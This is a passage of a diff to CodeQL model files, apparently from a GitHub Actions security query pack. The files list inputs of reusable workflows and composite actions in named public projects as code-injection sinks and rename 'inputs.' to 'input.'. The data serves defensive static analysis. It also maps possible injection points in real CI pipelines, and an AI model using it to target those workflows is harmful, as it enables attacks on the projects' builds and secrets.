b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["xrplf/rippled", "*", "inputs.configuration", "code-injection", "generated"] - - ["xrplf/rippled", "*", "inputs.cmake-target", "code-injection", "generated"] - - ["xrplf/rippled", "*", "inputs.cmake-args", "code-injection", "generated"] \ No newline at end of file + - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "input.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 789bdb53aed2..dca76acdc27d 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zcash/zcash", "*", "inputs.destination", "code-injection", "generated"] - - ["zcash/zcash", "*", "inputs.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file + - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 58389ad753e6..c0e357715de3 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zenml-io/zenml", "*", "inputs.install_integrations", "code-injection", "generated"] \ No newline at end of file + - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 853948c5ec33..2bc23972e785 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zeroc-ice/ice", "*", "inputs.flags", "code-injection", "generated"] - - ["zeroc-ice/ice", "*", "inputs.make_flags", "code-injection", "generated"] \ No newline at end of file + - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 2e8a6683a576..740bfd26d695 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "inputs.scenario", "code-injection", "generated"] \ No newline at end of file + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 55533f123127..f3bfa556ee5d 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_code", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_name", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "inputs.message", "code-injection", "generated"] - - ["8vim/8vim/.github/workflows/build.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "input.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index a14d41a15b9c..f8c4e3c68beb 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.base-pr-branch", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.head-pr-branch", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.reference-files", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.target-folder", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "inputs.build-command", "code-injection", "generated"] - - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "inputs.dist-path", "code-injection", "generated"] \ No newline at end of file + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "input.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "input.dist-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 0888318ad93c..793136cc3d3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.namespace-repository", "code-injection", "generated"] - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.file-dir", "code-injection", "generated"] - - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.build-args", "code-injection", "generated"] \ No newline at end of file + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.build-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index 6ea6dcdab704..e46601a7bff0 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] - - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 2c18a166cc1f..558ff908edf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] - - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index f065947dbdcc..a477e289d9ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "inputs.connector", "code-injection", "generated"] \ No newline at end of file + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index 438525e77e23..a72ace81445d 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index ca3111ad03af..26c0794a19c8 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 1e09e05e8b62..5ad39d5e184f 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index ad061ca714da..3c790f81d747 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.module", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.jdk", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.sql_compatibility", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.override_config_path", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.testing_groups", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.use_indexer", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.runtime_jdk", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.it", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.script", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.build_jdk", "code-injection", "generated"] \ No newline at end of file + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.testing_groups", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 3a721a0f2cf9..50fdcfd5a2d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.environment", "code-injection", "generated"] - - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index bdabbb9ab609..6363564503c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.branch", "code-injection", "generated"] - - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index 6d8438462a8c..fce736676fea 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "inputs.pytestArgs", "code-injection", "generated"] \ No newline at end of file + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 6d7bf7af0c2d..593322a739eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3b198fbf653..b3984a7ab831 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index 9c3ae9bf1946..a6f1bd4569db 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "inputs.dist-tag", "code-injection", "generated"] \ No newline at end of file + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index 68a85006c6cc..b661a1fa26aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "inputs.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index ee336ee076c8..0f58971041d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "inputs.terraform_workingdir", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.parameters-file", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.workspace_name", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.resource_group", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.dockerfile-location", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.environment_file", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.workspace_name", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.resource_group", "code-injection", "generated"] \ No newline at end of file + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.environment_file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index 3d3f727923a0..f12a337d71dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index f18d1e4c50ab..76796b4ae383 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 21db2585a5e8..8cc08edff5d6 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.shell", "code-injection", "generated"] - - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.environment", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 3f263608c21b..c2963eb76f45 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 017d0bc89f53..66aea90b41a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 1a38d6b35ade..49ed7bca899b 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_NAME", "code-injection", "generated"] - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file + - 